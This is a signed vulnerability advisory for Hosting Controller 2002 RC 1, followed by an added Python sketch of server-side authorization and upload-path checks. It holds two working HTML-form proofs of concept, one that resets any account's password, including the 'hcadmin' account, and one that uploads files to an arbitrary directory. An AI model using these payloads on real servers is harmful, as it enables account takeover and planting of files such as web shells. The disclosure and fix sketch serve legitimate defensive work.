-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hello,

I've found 2 vulnerabilities in Hosting Controller that allow remote authenticated users to change every user password or upload files in every directory.

Here are the PoCs:

This one allows modifying passwords:

<form action="http://[URL]/admin/accounts/AccountActions.asp?ActionType=UpdateUser" method="post">
Username: <input name="UserName" value="hcadmin" type="text" size="50"> <br>
Name: <input name="FullName" value="g|25|h" type="text" size="50"> <br>
ChangePass (type true): <input type="checkbox" name="PassCheck" value="TRUE"> <br>
Password: <input name="Pass1" title="Password"> <br>
Confirm: <input name="ConfPass" title="Password"> <br>
<input name="submit" value="submit" type="submit">
</form>
<br>
PS: You should have authenticated access.<br>
<br>
- -------------------------<br>
Vulnerable versions:<br>
- - HC 2002 RC 1<br>
Other versions may be vulnerable

And this one allows uploading:

<form method="POST" action="http://[URL]/admin/folders/saveuploadfiles.asp" enctype="multipart/form-data">
Where upload files: <input name="OpenPath" value="E:\webspace\test"> <br>
File 1: <input type="file" name="file1" value><br>
File 2: <input type="file" name="file2" value><br>
File 3: <input type="file" name="file3" value><br>
File 4: <input type="file" name="file4" value><br>
<input type="submit" value="Upload Files" name="upload"><br>
<br><br>
PS: If you see an error message, it's not important. You just should have authenticated access.
</form>
<br>
- -------------------------<br>
Vulnerable versions:<br>
- - HC 2002 RC 1<br>
Other versions may be vulnerable

These vulns were tested with HC 2002 RC 1, but other versions may be vulnerable.

Sorry for my English, but I'm Italian.

-----BEGIN PGP SIGNATURE-----
Version: 6.5.8ckt http://www.ipgpp.com/

iQA/AwUBRC/pBBMZt0KZeGPOEQK5lwCg13JhLH6ghgWoO8zUSG5EUZpmwtwAmwdh
KUkiwb7H3FkEdfZcORRpl4LH
=qlwF
-----END PGP SIGNATURE-----
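
Both forms above work because the server trusts a client-supplied field (UserName, OpenPath) without checking it against the logged-in session. The following is an added example, not code from the advisory or from Hosting Controller, sketching the two server-side checks that close this class of bug. The function names, the session model (a user name plus an admin flag) and the per-user root directory are assumptions made for illustration; Windows path rules are applied with Python's ntpath module.

```python
import ntpath
from typing import Optional


def may_update_user(session_user: str, session_is_admin: bool, target_user: str) -> bool:
    """Authorize an account update (hypothetical helper).

    The target account comes from the form (the UserName field); it must be
    compared with the identity held in the server-side session, never trusted.
    """
    if session_is_admin:
        return True
    return session_user.strip().lower() == target_user.strip().lower()


def resolve_upload_dir(user_root: str, open_path: str) -> Optional[str]:
    """Return the canonical upload directory if it lies inside user_root, else None.

    open_path is the client-supplied destination (the OpenPath field).
    user_root is the directory assigned to the logged-in user (assumption).
    """
    if not open_path or "\x00" in open_path:
        return None
    # UNC and device paths (\\server\share, \\?\...) never belong to a user root.
    if open_path.startswith(("\\\\", "//")):
        return None
    root = ntpath.normcase(ntpath.normpath(user_root))
    # Relative input is resolved under the root; absolute input replaces it.
    # Either way the result is normalized ("..", "/" and case) before the check.
    candidate = ntpath.normcase(ntpath.normpath(ntpath.join(root, open_path)))
    try:
        # commonpath compares whole path components, so a sibling such as
        # e:\webspace\test2 does not pass as a plain string-prefix test would.
        inside = ntpath.commonpath([root, candidate]) == root
    except ValueError:  # raised when the two paths are on different drives
        return None
    return candidate if inside else None


if __name__ == "__main__":
    # Constructed sample values; E:\webspace\test is the path shown in the form above.
    root = r"E:\webspace\test"
    for requested in (r"E:\webspace\test\images", r"..\other", r"C:\inetpub\wwwroot"):
        print(requested, "->", resolve_upload_dir(root, requested))
    print("non-admin editing hcadmin:", may_update_user("alice", False, "hcadmin"))
```

The containment check is lexical only; a real handler would also resolve junctions and symbolic links on the server before writing the file.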